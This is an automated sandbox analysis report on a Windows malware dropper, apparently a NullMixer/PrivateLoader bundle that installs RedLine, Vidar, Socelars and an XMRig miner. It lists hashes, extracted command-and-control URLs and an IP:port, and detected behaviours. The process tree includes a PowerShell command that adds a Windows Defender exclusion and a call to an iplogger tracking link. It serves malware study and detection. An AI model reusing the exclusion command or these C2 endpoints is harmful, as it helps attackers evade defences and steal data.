Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
25-11-2024 09:33
Static task
static1
Behavioral task
behavioral1
Sample
9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe
Resource
win10v2004-20241007-en
General
-
Target
9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe
-
Size
4.6MB
-
MD5
9aab74021fae67b0ec355bbc9138b1c4
-
SHA1
29ef8b5405f75c09e495e0937e3d9d8b8dbdf4ae
-
SHA256
befd232ab8dab62c010a0a96e0e62a1ff561509877fd8acfa1507df11e092aec
-
SHA512
d46b1edb1903b094db95136fbe7f078615450c3d9c5f376430d4abe8f3c76172d3af2782728b3089ac933392cd326da319da4b64ffd7532873896e45e7b4cd2b
-
SSDEEP
98304:yfKP0VfhaPhaEFHHiRCp4cCH6iUdIbLnTrgAQzuGIOqiC1c2MeS:yfm0Vf8PhaEFniRCp06i+qgksBC1c2xS
Malware Config
Extracted
socelars
http://www.iyiqian.com/
http://www.xxhufdc.top/
http://www.uefhkice.xyz/
http://www.fcektsy.top/
Extracted
nullmixer
http://watira.xyz/
Extracted
redline
Build1
45.142.213.135:30058
Signatures
-
Nullmixer family
-
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
Privateloader family
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral2/memory/1428-1455-0x0000000000400000-0x000000000041E000-memory.dmp family_redline -
Redline family
-
SectopRAT payload 1 IoCs
resource yara_rule behavioral2/memory/1428-1455-0x0000000000400000-0x000000000041E000-memory.dmp family_sectoprat -
Sectoprat family
-
Socelars family
-
Socelars payload 3 IoCs
resource yara_rule behavioral2/files/0x0007000000023ce6-26.dat family_socelars behavioral2/files/0x0007000000023cea-92.dat family_socelars behavioral2/memory/396-172-0x0000000000400000-0x0000000000BD8000-memory.dmp family_socelars -
Vidar family
-
Xmrig family
-
Vidar Stealer 1 IoCs
resource yara_rule behavioral2/memory/1828-389-0x0000000000400000-0x0000000002CC9000-memory.dmp family_vidar -
XMRig Miner payload 10 IoCs
resource yara_rule behavioral2/memory/5188-1573-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/5188-1575-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/5188-1578-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/5188-1581-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/5188-1579-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/5188-1577-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/5188-1580-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/5188-1583-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/5188-1584-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/5188-1613-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1828 powershell.exe -
resource yara_rule behavioral2/files/0x0007000000023ce4-40.dat aspack_v212_v242 behavioral2/files/0x0007000000023ce2-36.dat aspack_v212_v242 behavioral2/files/0x0008000000023cde-35.dat aspack_v212_v242 -
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation 1710990cbc64.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation 08240101651be7e010.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation chrome2.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation 1cr.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation BUILD1~1.EXE Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation services64.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation 9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation setup_installer.exe -
Executes dropped EXE 21 IoCs
pid Process 1540 setup_installer.exe 396 setup_install.exe 1452 4f5baa1083db067.exe 4344 1710990cbc64.exe 2724 08240101651be7e1.exe 3628 53516815d3135fe3.exe 1004 c862a054a35.exe 4336 9aa6e16872.exe 2936 453c5fa76a849.exe 4572 f34b9ab9db6d16.exe 1828 e4b2f18fb52218.exe 2708 08240101651be7e010.exe 4464 1cr.exe 2968 chrome2.exe 2276 1710990cbc64.exe 2488 setup.exe 1516 winnetdriv.exe 2828 services64.exe 1428 1cr.exe 636 BUILD1~1.EXE 6020 sihost64.exe -
Loads dropped DLL 5 IoCs
pid Process 396 setup_install.exe 396 setup_install.exe 396 setup_install.exe 396 setup_install.exe 396 setup_install.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 08240101651be7e1.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\manifest.json 9aa6e16872.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs
flow ioc 139 raw.githubusercontent.com 22 iplogger.org 120 iplogger.org 37 iplogger.org 117 iplogger.org 140 raw.githubusercontent.com 146 pastebin.com 149 pastebin.com 20 iplogger.org 36 iplogger.org -
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 12 ipinfo.io 13 ipinfo.io 17 api.db-ip.com 19 api.db-ip.com -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4464 set thread context of 1428 4464 1cr.exe 158 PID 2828 set thread context of 5188 2828 services64.exe 185 -
Drops file in Program Files directory 7 IoCs
description ioc Process File opened for modification C:\Program Files\Google\Chrome\Application\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log chrome.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\winnetdriv.exe setup.exe File opened for modification C:\Windows\winnetdriv.exe setup.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 1492 396 WerFault.exe 85 4616 2936 WerFault.exe 104 -
System Location Discovery: System Language Discovery 1 TTPs 30 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BUILD1~1.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup_install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1710990cbc64.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 08240101651be7e010.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winnetdriv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1cr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9aa6e16872.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 453c5fa76a849.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1cr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup_installer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e4b2f18fb52218.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f34b9ab9db6d16.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1710990cbc64.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 453c5fa76a849.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 453c5fa76a849.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 453c5fa76a849.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 e4b2f18fb52218.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString e4b2f18fb52218.exe -
Enumerates system info in registry 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe -
Kills process with taskkill 1 IoCs
pid Process 4748 taskkill.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6108 schtasks.exe 3164 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1828 e4b2f18fb52218.exe 1828 e4b2f18fb52218.exe 1828 e4b2f18fb52218.exe 1828 e4b2f18fb52218.exe 1828 e4b2f18fb52218.exe 1828 e4b2f18fb52218.exe 1828 e4b2f18fb52218.exe 1828 e4b2f18fb52218.exe 5020 chrome.exe 5020 chrome.exe 4408 chrome.exe 2968 chrome2.exe 2968 chrome2.exe 4572 f34b9ab9db6d16.exe 4572 f34b9ab9db6d16.exe 4572 f34b9ab9db6d16.exe 4572 f34b9ab9db6d16.exe 4572 f34b9ab9db6d16.exe 4572 f34b9ab9db6d16.exe 4572 f34b9ab9db6d16.exe 4572 f34b9ab9db6d16.exe 4572 f34b9ab9db6d16.exe 4572 f34b9ab9db6d16.exe 4572 f34b9ab9db6d16.exe 4572 f34b9ab9db6d16.exe 4572 f34b9ab9db6d16.exe 4572 f34b9ab9db6d16.exe 4572 f34b9ab9db6d16.exe 4572 f34b9ab9db6d16.exe 4572 f34b9ab9db6d16.exe 4572 f34b9ab9db6d16.exe 4572 f34b9ab9db6d16.exe 4572 f34b9ab9db6d16.exe 4572 f34b9ab9db6d16.exe 4572 f34b9ab9db6d16.exe 4572 f34b9ab9db6d16.exe 4572 f34b9ab9db6d16.exe 1828 powershell.exe 1828 powershell.exe 1828 powershell.exe 3124 msedge.exe 3124 msedge.exe 4712 msedge.exe 4712 msedge.exe 5356 identity_helper.exe 5356 identity_helper.exe 2828 services64.exe 2828 services64.exe 5188 explorer.exe 5188 explorer.exe 5188 explorer.exe 5188 explorer.exe 5188 explorer.exe 5188 explorer.exe 5188 explorer.exe 5188 explorer.exe 5188 explorer.exe 5188 explorer.exe 5188 explorer.exe 5188 explorer.exe 5188 explorer.exe 5188 explorer.exe 5188 explorer.exe 5188 explorer.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
pid Process 5020 chrome.exe 5020 chrome.exe 5020 chrome.exe 5020 chrome.exe 5020 chrome.exe 5020 chrome.exe 5020 chrome.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1452 4f5baa1083db067.exe Token: SeCreateTokenPrivilege 4336 9aa6e16872.exe Token: SeAssignPrimaryTokenPrivilege 4336 9aa6e16872.exe Token: SeLockMemoryPrivilege 4336 9aa6e16872.exe Token: SeIncreaseQuotaPrivilege 4336 9aa6e16872.exe Token: SeMachineAccountPrivilege 4336 9aa6e16872.exe Token: SeTcbPrivilege 4336 9aa6e16872.exe Token: SeSecurityPrivilege 4336 9aa6e16872.exe Token: SeTakeOwnershipPrivilege 4336 9aa6e16872.exe Token: SeLoadDriverPrivilege 4336 9aa6e16872.exe Token: SeSystemProfilePrivilege 4336 9aa6e16872.exe Token: SeSystemtimePrivilege 4336 9aa6e16872.exe Token: SeProfSingleProcessPrivilege 4336 9aa6e16872.exe Token: SeIncBasePriorityPrivilege 4336 9aa6e16872.exe Token: SeCreatePagefilePrivilege 4336 9aa6e16872.exe Token: SeCreatePermanentPrivilege 4336 9aa6e16872.exe Token: SeBackupPrivilege 4336 9aa6e16872.exe Token: SeRestorePrivilege 4336 9aa6e16872.exe Token: SeShutdownPrivilege 4336 9aa6e16872.exe Token: SeDebugPrivilege 4336 9aa6e16872.exe Token: SeAuditPrivilege 4336 9aa6e16872.exe Token: SeSystemEnvironmentPrivilege 4336 9aa6e16872.exe Token: SeChangeNotifyPrivilege 4336 9aa6e16872.exe Token: SeRemoteShutdownPrivilege 4336 9aa6e16872.exe Token: SeUndockPrivilege 4336 9aa6e16872.exe Token: SeSyncAgentPrivilege 4336 9aa6e16872.exe Token: SeEnableDelegationPrivilege 4336 9aa6e16872.exe Token: SeManageVolumePrivilege 4336 9aa6e16872.exe Token: SeImpersonatePrivilege 4336 9aa6e16872.exe Token: SeCreateGlobalPrivilege 4336 9aa6e16872.exe Token: 31 4336 9aa6e16872.exe Token: 32 4336 9aa6e16872.exe Token: 33 4336 9aa6e16872.exe Token: 34 4336 9aa6e16872.exe Token: 35 4336 9aa6e16872.exe Token: SeDebugPrivilege 1004 c862a054a35.exe Token: SeDebugPrivilege 4748 taskkill.exe Token: SeShutdownPrivilege 5020 chrome.exe Token: SeCreatePagefilePrivilege 5020 chrome.exe Token: SeShutdownPrivilege 5020 chrome.exe Token: SeCreatePagefilePrivilege 5020 chrome.exe Token: SeShutdownPrivilege 5020 chrome.exe Token: SeCreatePagefilePrivilege 5020 chrome.exe Token: SeShutdownPrivilege 5020 chrome.exe Token: SeCreatePagefilePrivilege 5020 chrome.exe Token: SeShutdownPrivilege 5020 chrome.exe Token: SeCreatePagefilePrivilege 5020 chrome.exe Token: SeShutdownPrivilege 5020 chrome.exe Token: SeCreatePagefilePrivilege 5020 chrome.exe Token: SeShutdownPrivilege 5020 chrome.exe Token: SeCreatePagefilePrivilege 5020 chrome.exe Token: SeShutdownPrivilege 5020 chrome.exe Token: SeCreatePagefilePrivilege 5020 chrome.exe Token: SeShutdownPrivilege 5020 chrome.exe Token: SeCreatePagefilePrivilege 5020 chrome.exe Token: SeShutdownPrivilege 5020 chrome.exe Token: SeCreatePagefilePrivilege 5020 chrome.exe Token: SeShutdownPrivilege 5020 chrome.exe Token: SeCreatePagefilePrivilege 5020 chrome.exe Token: SeShutdownPrivilege 5020 chrome.exe Token: SeCreatePagefilePrivilege 5020 chrome.exe Token: SeShutdownPrivilege 5020 chrome.exe Token: SeCreatePagefilePrivilege 5020 chrome.exe Token: SeShutdownPrivilege 5020 chrome.exe -
Suspicious use of FindShellTrayWindow 27 IoCs
pid Process 5020 chrome.exe 5020 chrome.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe 4712 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3160 wrote to memory of 1540 3160 9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe 84 PID 3160 wrote to memory of 1540 3160 9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe 84 PID 3160 wrote to memory of 1540 3160 9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe 84 PID 1540 wrote to memory of 396 1540 setup_installer.exe 85 PID 1540 wrote to memory of 396 1540 setup_installer.exe 85 PID 1540 wrote to memory of 396 1540 setup_installer.exe 85 PID 396 wrote to memory of 3544 396 setup_install.exe 88 PID 396 wrote to memory of 3544 396 setup_install.exe 88 PID 396 wrote to memory of 3544 396 setup_install.exe 88 PID 396 wrote to memory of 4596 396 setup_install.exe 89 PID 396 wrote to memory of 4596 396 setup_install.exe 89 PID 396 wrote to memory of 4596 396 setup_install.exe 89 PID 396 wrote to memory of 4932 396 setup_install.exe 90 PID 396 wrote to memory of 4932 396 setup_install.exe 90 PID 396 wrote to memory of 4932 396 setup_install.exe 90 PID 396 wrote to memory of 4620 396 setup_install.exe 91 PID 396 wrote to memory of 4620 396 setup_install.exe 91 PID 396 wrote to memory of 4620 396 setup_install.exe 91 PID 396 wrote to memory of 328 396 setup_install.exe 92 PID 396 wrote to memory of 328 396 setup_install.exe 92 PID 396 wrote to memory of 328 396 setup_install.exe 92 PID 396 wrote to memory of 4132 396 setup_install.exe 93 PID 396 wrote to memory of 4132 396 setup_install.exe 93 PID 396 wrote to memory of 4132 396 setup_install.exe 93 PID 396 wrote to memory of 1408 396 setup_install.exe 94 PID 396 wrote to memory of 1408 396 setup_install.exe 94 PID 396 wrote to memory of 1408 396 setup_install.exe 94 PID 396 wrote to memory of 3788 396 setup_install.exe 95 PID 396 wrote to memory of 3788 396 setup_install.exe 95 PID 396 wrote to memory of 3788 396 setup_install.exe 95 PID 396 wrote to memory of 3252 396 setup_install.exe 96 PID 396 wrote to memory of 3252 396 setup_install.exe 96 PID 396 wrote to memory of 3252 396 setup_install.exe 96 PID 396 wrote to memory of 2972 396 setup_install.exe 97 PID 396 wrote to memory of 2972 396 setup_install.exe 97 PID 396 wrote to memory of 2972 396 setup_install.exe 97 PID 4132 wrote to memory of 1452 4132 cmd.exe 98 PID 4132 wrote to memory of 1452 4132 cmd.exe 98 PID 4932 wrote to memory of 4344 4932 cmd.exe 99 PID 4932 wrote to memory of 4344 4932 cmd.exe 99 PID 4932 wrote to memory of 4344 4932 cmd.exe 99 PID 3544 wrote to memory of 2724 3544 cmd.exe 100 PID 3544 wrote to memory of 2724 3544 cmd.exe 100 PID 4620 wrote to memory of 3628 4620 cmd.exe 101 PID 4620 wrote to memory of 3628 4620 cmd.exe 101 PID 328 wrote to memory of 1004 328 cmd.exe 102 PID 328 wrote to memory of 1004 328 cmd.exe 102 PID 4596 wrote to memory of 4336 4596 cmd.exe 103 PID 4596 wrote to memory of 4336 4596 cmd.exe 103 PID 4596 wrote to memory of 4336 4596 cmd.exe 103 PID 3252 wrote to memory of 2936 3252 cmd.exe 104 PID 3252 wrote to memory of 2936 3252 cmd.exe 104 PID 3252 wrote to memory of 2936 3252 cmd.exe 104 PID 1408 wrote to memory of 4572 1408 cmd.exe 105 PID 1408 wrote to memory of 4572 1408 cmd.exe 105 PID 1408 wrote to memory of 4572 1408 cmd.exe 105 PID 3788 wrote to memory of 1828 3788 cmd.exe 106 PID 3788 wrote to memory of 1828 3788 cmd.exe 106 PID 3788 wrote to memory of 1828 3788 cmd.exe 106 PID 2972 wrote to memory of 2708 2972 cmd.exe 107 PID 2972 wrote to memory of 2708 2972 cmd.exe 107 PID 2972 wrote to memory of 2708 2972 cmd.exe 107 PID 2724 wrote to memory of 4464 2724 08240101651be7e1.exe 109 PID 2724 wrote to memory of 4464 2724 08240101651be7e1.exe 109 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3160 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1540 -
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:396 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 08240101651be7e1.exe4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3544 -
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e1.exe08240101651be7e1.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4464 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1828
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1428
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXEC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:636 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS8B14.tmp\Install.cmd" "7⤵
- System Location Discovery: System Language Discovery
PID:436 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/16B4c78⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4712 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc4eaa46f8,0x7ffc4eaa4708,0x7ffc4eaa47189⤵PID:3340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1968 /prefetch:29⤵PID:4080
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:39⤵
- Suspicious behavior: EnumeratesProcesses
PID:3124
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:89⤵PID:4532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:19⤵PID:3760
-
-
